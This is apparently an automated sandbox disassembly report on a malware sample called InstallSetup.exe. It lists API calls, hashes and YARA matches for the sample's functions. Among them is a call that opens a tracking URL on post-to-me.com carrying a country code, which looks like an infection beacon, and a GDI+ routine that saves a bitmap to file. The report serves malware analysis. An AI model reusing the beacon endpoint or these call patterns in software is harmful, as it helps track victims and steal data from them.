                                                                                                • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                                                APIs
                                                                                                • _SpinWait.LIBCONCRT ref: 0095B152
                                                                                                  • Part of subcall function 00951188: _SpinWait.LIBCONCRT ref: 009511A0
                                                                                                • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0095B166
                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0095B198
                                                                                                • List.LIBCMT ref: 0095B21B
                                                                                                • List.LIBCMT ref: 0095B22A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                • String ID:
                                                                                                • API String ID: 3281396844-0
                                                                                                • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                • Instruction ID: 506577e3306a9d46d51a53ab08da217ee01cd9012f085399257d8bd17e6b3b00
                                                                                                • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                • Instruction Fuzzy Hash: 23316B31D05A16DFCB14EFA6C5A16EDB7B0BF95306F14006ADC1167682CB716D4CCBA0
                                                                                                APIs
                                                                                                • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                                                  • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                                                • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                                                • List.LIBCMT ref: 0041AFB4
                                                                                                • List.LIBCMT ref: 0041AFC3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                • String ID:
                                                                                                • API String ID: 3281396844-0
                                                                                                • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                                                • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                                                APIs
                                                                                                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                                                                • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                                                                • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                                                                • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                • String ID:
                                                                                                • API String ID: 2357751836-0
                                                                                                • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                                                                • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                                                                APIs
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 009450A3
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 009450B7
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 0094511C
                                                                                                • __Getcoll.LIBCPMT ref: 0094512B
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0094513B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                                                                • String ID:
                                                                                                • API String ID: 2395760641-0
                                                                                                • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                • Instruction ID: dd8937b88ea09c64a47bc7f84943854bd5141e898b8907a1ffc20e399ec2aea4
                                                                                                • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                • Instruction Fuzzy Hash: 5321CCB1819205AFDB10EFA0C495FECB7B0BF94311F10805AF085AB282DBB48944CB95
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(0094DAD7,0094DAD7,00000002,0096ED35,00973951,00000000,?,00966A05,00000002,00000000,00000000,00000000,?,0094CF88,0094DAD7,00000004), ref: 009721CA
                                                                                                • _free.LIBCMT ref: 009721FF
                                                                                                • _free.LIBCMT ref: 00972226
                                                                                                • SetLastError.KERNEL32(00000000,?,0094DAD7), ref: 00972233
                                                                                                • SetLastError.KERNEL32(00000000,?,0094DAD7), ref: 0097223C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                • Instruction ID: 53b45cc12c960163bf34710af4fe7734ddd4e6cd573c0534714f6eb9a5f181b8
                                                                                                • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                • Instruction Fuzzy Hash: AE01F937255B007B961A2B345C46F2A261DBBD1B727318538F42D922E3EEB4CD015129
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                • _free.LIBCMT ref: 00431F98
                                                                                                • _free.LIBCMT ref: 00431FBF
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                                                                • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
                                                                                                • _free.LIBCMT ref: 00972178
                                                                                                • _free.LIBCMT ref: 009721A0
                                                                                                • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721AD
                                                                                                • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                • Instruction ID: e49e1d6f6162bf64975d044239f085b9d71e7853a2916bab20f8e1e837875877
                                                                                                • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                • Instruction Fuzzy Hash: 2FF0A937158A007BD6122734AC46B1A262DBBC2B72F618128F91C926E1FE6589025129
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                • _free.LIBCMT ref: 00431F11
                                                                                                • _free.LIBCMT ref: 00431F39
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                                                                • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                                                                APIs
                                                                                                  • Part of subcall function 009529A4: TlsGetValue.KERNEL32(?,?,00950DC2,00952ECF,00000000,?,00950DA0,?,?,?,00000000,?,00000000), ref: 009529AA
                                                                                                • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00957BB1
                                                                                                  • Part of subcall function 0096121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00961241
                                                                                                  • Part of subcall function 0096121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0096125A
                                                                                                  • Part of subcall function 0096121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 009612D0
                                                                                                  • Part of subcall function 0096121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 009612D8
                                                                                                • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00957BBF
                                                                                                • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00957BC9
                                                                                                • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00957BD3
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00957BF1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                • String ID:
                                                                                                • API String ID: 4266703842-0
                                                                                                • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                • Instruction ID: 74547d7e1623e745d1cbde0bab12f2672a67b4907bec516b87b701e66234d3f5
                                                                                                • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                • Instruction Fuzzy Hash: 3AF0F63160021867CF15F7B79822A6EF6299FD1B12F04416AFC1053292EF249E0D87D1
                                                                                                APIs
                                                                                                  • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                                                                • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                                                                  • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                                                                  • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                                                                  • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                                                                  • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                                                                • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                                                • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                                                • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                • String ID:
                                                                                                • API String ID: 4266703842-0
                                                                                                • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                                                • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0097A0C4
                                                                                                  • Part of subcall function 009736D1: HeapFree.KERNEL32(00000000,00000000,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?), ref: 009736E7
                                                                                                  • Part of subcall function 009736D1: GetLastError.KERNEL32(?,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?,?), ref: 009736F9
                                                                                                • _free.LIBCMT ref: 0097A0D6
                                                                                                • _free.LIBCMT ref: 0097A0E8
                                                                                                • _free.LIBCMT ref: 0097A0FA
                                                                                                • _free.LIBCMT ref: 0097A10C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                • Instruction ID: f8e67f2867b4a83e6a8fc8c01a1b5f494c9157ce0788e9d9c2df0394740406e1
                                                                                                • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                • Instruction Fuzzy Hash: E8F06273509200BB8A60EB64E8C3D1A73DDBA80750B64CD55F00CD7B12CB71FC90965A
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00439E5D
                                                                                                  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                • _free.LIBCMT ref: 00439E6F
                                                                                                • _free.LIBCMT ref: 00439E81
                                                                                                • _free.LIBCMT ref: 00439E93
                                                                                                • _free.LIBCMT ref: 00439EA5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                                                • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 009719AF
                                                                                                  • Part of subcall function 009736D1: HeapFree.KERNEL32(00000000,00000000,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?), ref: 009736E7
                                                                                                  • Part of subcall function 009736D1: GetLastError.KERNEL32(?,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?,?), ref: 009736F9
                                                                                                • _free.LIBCMT ref: 009719C1
                                                                                                • _free.LIBCMT ref: 009719D4
                                                                                                • _free.LIBCMT ref: 009719E5
                                                                                                • _free.LIBCMT ref: 009719F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                • Instruction ID: bc4a2cbf2719e0671cda57d104ea38a064b54905e13c397da2cf6aac788c20aa
                                                                                                • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                • Instruction Fuzzy Hash: AAF05BB1D103106B9E617F24BC824043B64FF197227008266F40A977B3C774DAA3EB8E
                                                                                                APIs
                                                                                                • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0095CF36
                                                                                                • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0095CF67
                                                                                                • GetCurrentThread.KERNEL32 ref: 0095CF70
                                                                                                • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0095CF83
                                                                                                • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0095CF8C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                • String ID:
                                                                                                • API String ID: 2583373041-0
                                                                                                • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                • Instruction ID: 6014519e8e57bc25ddbd25bdc8776ad3bc6cc4476c376c1eab93348b22c5c5df
                                                                                                • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                • Instruction Fuzzy Hash: D7F0A032201600DFC625EF22EA519BAB7B6AFC4712350450CFD8B06651CF21A94ED771
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00431748
                                                                                                  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                • _free.LIBCMT ref: 0043175A
                                                                                                • _free.LIBCMT ref: 0043176D
                                                                                                • _free.LIBCMT ref: 0043177E
                                                                                                • _free.LIBCMT ref: 0043178F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                                                                • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                                                                APIs
                                                                                                • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                                                                • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                                                                • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                                                                • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                                                                • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                • String ID:
                                                                                                • API String ID: 2583373041-0
                                                                                                • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                                                                • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 00942E8E
                                                                                                  • Part of subcall function 00941321: _wcslen.LIBCMT ref: 00941328
                                                                                                  • Part of subcall function 00941321: _wcslen.LIBCMT ref: 00941344
                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 009430A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InternetOpen_wcslen
                                                                                                • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                • API String ID: 3381584094-4083784958
                                                                                                • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                • Instruction ID: c9b8111cddffb2aaee452969f8c72e96a1449808d3129d18965e443c5590691d
                                                                                                • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                • Instruction Fuzzy Hash: 1D515395A55344A8E320EFB0BC56F723378FF58712F10543AE518CB2B2E7B19944871E
                                                                                                APIs
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0096896A
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00968A23
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: fB$csm
                                                                                                • API String ID: 3480331319-1586063737
                                                                                                • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                • Instruction ID: 6ab9b9e5c33df797c14dbeace9a2a2b74dc7f2c021f5ce2a8912ea7cf0da84d1
                                                                                                • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                • Instruction Fuzzy Hash: 84410A34A00248DBCF10DF68C845AAF7BB5AF45328F148266ED156B392DB36DD05CF91
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\InstallSetup.exe,00000104), ref: 0096F9BA
                                                                                                • _free.LIBCMT ref: 0096FA85
                                                                                                • _free.LIBCMT ref: 0096FA8F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: C:\Users\user\Desktop\InstallSetup.exe
                                                                                                • API String ID: 2506810119-1732551550
                                                                                                • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                • Instruction ID: 4c3ed202eb807a2d540da1418d029eaf51d574bcacac8cd522b7de5f58433f16
                                                                                                • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                • Instruction Fuzzy Hash: 40317071A00258EFDB21DFD9ED95E9EBBFCEF99710B104076E80897212E6749E40CB94
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\InstallSetup.exe,00000104), ref: 0042F753
                                                                                                • _free.LIBCMT ref: 0042F81E
                                                                                                • _free.LIBCMT ref: 0042F828
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
